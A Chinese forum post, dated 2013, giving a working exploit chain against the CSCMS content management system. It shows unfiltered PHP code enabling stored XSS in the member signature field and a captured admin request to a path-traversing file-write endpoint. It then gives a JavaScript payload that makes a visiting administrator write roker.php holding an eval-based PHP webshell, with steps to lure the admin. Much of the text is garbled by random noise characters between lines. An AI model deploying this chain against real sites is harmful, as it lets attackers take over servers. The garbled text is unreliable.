|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题2 A3 ^: X4 N, J3 U' ^
官网已经修补了,所以重新下了源码
* n0 p" R" }* V8 E P/ e6 b! ]因为 后台登入 还需要认证码 所以 注入就没看了。
, l# ~$ F7 n" U7 a( ` D4 z K存在 xss; a8 D, M/ ~" A2 ^4 e
漏洞文件 user/member/skin_edit.php
* y6 D" t7 z. U) P% q# b( K本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
! y0 d/ u( t" d8 P - S) M0 I1 K: T! F4 V- H$ Z9 Q9 w
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
E, L1 }, V3 D+ {
2 m7 Z- w' P; @2 z2 m1 t</textarea></td></tr>
' B7 k8 m! H; v6 |! C; A Z
$ q1 s( F6 \/ `+ w1 E4 [4 { user/do.php
. ]& a1 G8 {" V- F0 O
# Z4 L- a0 M8 n" L8 X0 C9 n. i2 [0 A) B' v
if($op=='zl'){ //资料
1 ^ }4 m% m6 p * U( i% h! @9 N9 y7 i ^! K
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
3 z$ |6 V: @, Q, k+ A exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));% K: A. N5 _, r2 Z- i' g0 v; f3 e
( J9 E p* L5 P+ l* t) A $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
) k* P! E: L5 [! b/ F; q
- ]' }: K( ?0 f0 k5 L CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."': B7 q% c" S! c& m
where CS_Name='".$cscms_name."'";
8 l; {$ {8 L9 `1 [
! U3 G4 O; a: M- z if($db->query($sql)){
4 m/ [: y* d, h3 i, o : T# p3 g% E/ S1 C2 [$ x
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));7 X' b2 i2 ?* C, e8 J% v8 l
" K5 \4 p$ u0 n e }else{
- x4 B- J7 [/ L$ d
8 c7 U7 m3 y0 s) R) i$ Z+ Z exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));* m7 x' j6 ?: W& v4 Y
7 Y" d! ~8 ^ b6 M; |: I: t' |
}
' r: U+ X5 f4 I$ p
8 g* K0 q" {/ |. z i' A# w% `# \, Q. Y5 ~0 G- L
没有 过滤导致xss产生。
, f5 ]; Y6 D; A( t后台 看了下 很奇葩的是可以写任意格式文件。。
# a& c- C5 w+ f: M: E3 R/ P# a' Q/ ^7 p) F抓包。。
: Q/ h. {5 U6 `
, A- w) \5 n5 F4 c' q7 e" j1 m7 N# V& G0 H
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1& Q! b3 c! w2 S1 z# y9 A/ [! w
: I# ]2 a A9 i" _2 L; ]
Accept: text/html, application/xhtml+xml, */*
( \! m, g# W5 s4 P/ J: R
( W. X$ C* ]5 ~2 a0 e3 q& pReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
4 B3 W8 H( ?' K9 w
5 K, Z& `4 A8 o5 S7 f9 RAccept-Language: zh-CN; i4 m3 Y, a. ^ P4 q* R, |* H4 Z! q
: T' O, V+ d N _7 BUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
. @2 E9 V" O4 J$ g # {0 Q$ N# g4 g+ ]6 j# O
Content-Type: application/x-www-form-urlencoded
/ R- H1 i. o. E! q" i! \; } * O5 a* |9 B( R8 k1 @5 w1 h1 `% N
Accept-Encoding: gzip, deflate
) T* H4 _! X" J% K5 J( u
3 h/ i# R( U' T, K! l. T1 g& S) lHost: 127.0.0.1
- F/ f" u% g6 Q/ [: o: s7 {; n* c* \
- o: H$ k2 n% ^1 cContent-Length: 38
N Q0 @. D/ L1 i! f& l . r' T5 K+ S4 m" A
DNT: 1
7 s. a o3 d& o 4 d8 Y0 \0 x k& L+ G
Connection: Keep-Alive0 M( E3 [: W6 C0 R: X
& [# [: f/ `; E3 ~5 V$ v5 Y
Cache-Control: no-cache3 N! Z8 ^( `3 Z4 V8 `1 v$ b
& H# w8 Y4 J E2 |( ^* T: sCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
K3 v4 J, \% m- i
7 `" O5 w) u% p+ Q: a0 v) Y
3 U0 J6 X- u. J, z/ N$ M# Oname=aaa.php&content=%3Cs%3E%3Ca%25%3E
( r' \2 \8 ?' c$ f1 @) d8 r& g3 }/ T' u7 L% R% K+ Q+ r
5 ~. x; k: c e, l, e5 L6 L
, ?2 _! p1 y- Q+ v4 e于是 构造js如下。' J- q9 n; s8 f( N
4 H4 \4 e8 z! P1 j6 L/ L本帖隐藏的内容<script> 8 ]4 G. O' ~1 f+ T' T a) e$ s
thisTHost = top.location.hostname;1 Q" v k. i: A9 W
+ n* ~3 ~" B* q
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";5 Q% X$ X) f6 F2 W- T, X
9 t/ ?/ S& D0 D. wfunction PostSubmit(url, data, msg) {
" R4 B$ Y4 Q9 M var postUrl = url;
) c4 Q0 h+ r a* E1 M2 m & ^; V. H5 L% [7 c" N% @4 o
var postData = data;
, c% V' |' T" S! s! C% W var msgData = msg; * u( Y: p4 z% v! k8 E
var ExportForm = document.createElement("FORM");
" D7 C8 j# A" i. K4 S document.body.appendChild(ExportForm);
6 T5 i4 Z9 @2 @& X# C ExportForm.method = "POST"; . }& F) l0 |0 g5 L' l& j. S
var newElement = document.createElement("input"); 6 ?% ^- J7 F, n& C. _
newElement.setAttribute("name", "name");
! S4 b+ M) ~, k! X, R) a1 G newElement.setAttribute("type", "hidden");
( `- S- \) q9 m5 I; B var newElement2 = document.createElement("input"); / J* V5 T% L7 X* `9 w2 f
newElement2.setAttribute("name", "content");
$ [! o) Y# J4 F/ r4 { newElement2.setAttribute("type", "hidden");
& o, m' u4 z' l& x* P# i* X ExportForm.appendChild(newElement); " _# A, a; m& ?: C4 y) b" R
ExportForm.appendChild(newElement2);
: o; n. A+ y7 ~0 Q$ u newElement.value = postData;
* F" S0 z' ?5 E/ Z newElement2.value = msgData; 3 V, R) A6 C7 w' U' `
ExportForm.action = postUrl;
* v/ f& ~& ]& f3 `& X8 | ExportForm.submit(); ( U/ R" S. q1 y' k; @$ j! c; C
};& s$ E/ o' x( K: D- ~& e
" d) M! T: G p7 ^) v
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
3 s0 T5 m# I) S + V* N( P2 l: e
</script>
6 t3 D) w" p& ^3 g& V! B# k. ]" Q0 o" u( j9 F! i& G
4 K2 I- y' b) w [9 ?4 G# S
% c4 a p% E3 B- F$ C# n0 nhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
' W% w" @$ W9 T8 Z5 O' v用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
?# J2 c/ }" ?3 S S3 `就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
( q; f* z; x2 Y' N- h, B6 C
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对